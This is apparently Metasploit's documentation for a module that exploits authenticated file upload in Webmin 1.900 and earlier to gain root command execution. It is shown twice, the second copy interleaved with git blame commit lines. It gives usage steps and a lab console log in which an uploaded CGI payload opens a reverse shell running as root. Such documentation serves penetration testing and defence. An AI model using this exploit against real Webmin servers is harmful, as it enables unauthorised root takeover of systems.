documentation/modules/exploit/unix/webapp/webmin_upload_exec.md

## Description

This module exploits an arbitrary command execution vulnerability in Webmin 1.900 and lower versions. Any user authorized to the "Upload and Download" module can execute arbitrary commands with root privileges. In addition, if the 'Running Processes' (proc) privilege is set the user can accurately determine which directory to upload to. Webmin application files can be written/overwritten, which allows remote code execution. The module has been tested successfully with Webmin 1.900.

## Vulnerable Application

This module has been tested with [Webmin 1.900](https://sourceforge.net/projects/webadmin/files/webmin/1.900/)

## Options

**GUESSUPLOAD**

Use default installation path `/usr/share/webmin/`

## Verification Steps

1. `use exploit/unix/webapp/webmin_upload_exec`
2. `set rhosts <rhost>`
3. `set username <username>`
4. `set password <password>`
5. `exploit`

## Scenarios

### Tested Webmin 1.900 on Ubuntu 18.04 x64

```
msf > use exploit/unix/webapp/webmin_upload_exec
msf exploit(unix/webapp/webmin_upload_exec) > set rhosts 172.22.222.154
rhosts => 172.22.222.154
msf exploit(unix/webapp/webmin_upload_exec) > set username unixuser
username => unixuser
msf exploit(unix/webapp/webmin_upload_exec) > set password unixuser
password => unixuser
msf exploit(unix/webapp/webmin_upload_exec) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[+] Session cookie: 6215747dab393701e0acbb9ac5b7c699
[*] Target URL => https://172.22.222.154:10000
[*] Searching for directory to upload...
[-] Failed to determine webmin share directory
[-] Set GUESSUPLOAD to attempt upload to a default location
[*] Exploit completed, but no session was created.
msf exploit(unix/webapp/webmin_upload_exec) > set guessupload true
guessupload => true
msf exploit(unix/webapp/webmin_upload_exec) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[+] Session cookie: 46cbd354e4532fe55d1a462db128905c
[*] Target URL => https://172.22.222.154:10000
[*] Searching for directory to upload...
[!] Could not determine upload directory. Using /usr/share/webmin/
[+] File gxvgsiji.cgi was successfully uploaded.
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.154:38960) at 2019-03-14 13:40:56 -0500
[+] Deleted gxvgsiji.cgi

uname -a 
Linux ubuntu 4.18.0-16-generic #17~18.04.1-Ubuntu SMP Tue Feb 12 13:35:51 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
whoami
root
exit
```
Add Module Doc 2019-03-14 13:46:34 -05:00			`## Description`

			`This module exploits an arbitrary command execution vulnerability in Webmin 1.900 and lower versions. Any user authorized to the "Upload and Download" module can execute arbitrary commands with root privileges. In addition, if the 'Running Processes' (proc) privilege is set the user can accurately determine which directory to upload to. Webmin application files can be written/overwritten, which allows remote code execution. The module has been tested successfully with Webmin 1.900.`

			`## Vulnerable Application`

			`This module has been tested with [Webmin 1.900](https://sourceforge.net/projects/webadmin/files/webmin/1.900/)`

			`## Options`

			`GUESSUPLOAD`

			Use default installation path `/usr/share/webmin/`

			`## Verification Steps`

			1. `use exploit/unix/webapp/webmin_upload_exec`
			2. `set rhosts <rhost>`
			3. `set username <username>`
			4. `set password <password>`
			5. `exploit`

			`## Scenarios`

			`### Tested Webmin 1.900 on Ubuntu 18.04 x64`

			```
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf > use exploit/unix/webapp/webmin_upload_exec`
			`msf exploit(unix/webapp/webmin_upload_exec) > set rhosts 172.22.222.154`
Add Module Doc 2019-03-14 13:46:34 -05:00			`rhosts => 172.22.222.154`
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf exploit(unix/webapp/webmin_upload_exec) > set username unixuser`
Add Module Doc 2019-03-14 13:46:34 -05:00			`username => unixuser`
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf exploit(unix/webapp/webmin_upload_exec) > set password unixuser`
Add Module Doc 2019-03-14 13:46:34 -05:00			`password => unixuser`
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf exploit(unix/webapp/webmin_upload_exec) > exploit`
Add Module Doc 2019-03-14 13:46:34 -05:00
			`[*] Started reverse TCP handler on 172.22.222.136:4444`
			`[+] Session cookie: 6215747dab393701e0acbb9ac5b7c699`
			`[*] Target URL => https://172.22.222.154:10000`
			`[*] Searching for directory to upload...`
			`[-] Failed to determine webmin share directory`
			`[-] Set GUESSUPLOAD to attempt upload to a default location`
			`[*] Exploit completed, but no session was created.`
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf exploit(unix/webapp/webmin_upload_exec) > set guessupload true`
Add Module Doc 2019-03-14 13:46:34 -05:00			`guessupload => true`
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf exploit(unix/webapp/webmin_upload_exec) > exploit`
Add Module Doc 2019-03-14 13:46:34 -05:00
			`[*] Started reverse TCP handler on 172.22.222.136:4444`
			`[+] Session cookie: 46cbd354e4532fe55d1a462db128905c`
			`[*] Target URL => https://172.22.222.154:10000`
			`[*] Searching for directory to upload...`
			`[!] Could not determine upload directory. Using /usr/share/webmin/`
			`[+] File gxvgsiji.cgi was successfully uploaded.`
			`[*] Attempting to execute the payload...`
			`[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.154:38960) at 2019-03-14 13:40:56 -0500`
			`[+] Deleted gxvgsiji.cgi`

			`uname -a`
			`Linux ubuntu 4.18.0-16-generic #17~18.04.1-Ubuntu SMP Tue Feb 12 13:35:51 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux`
			`whoami`
			`root`
			`exit`
			```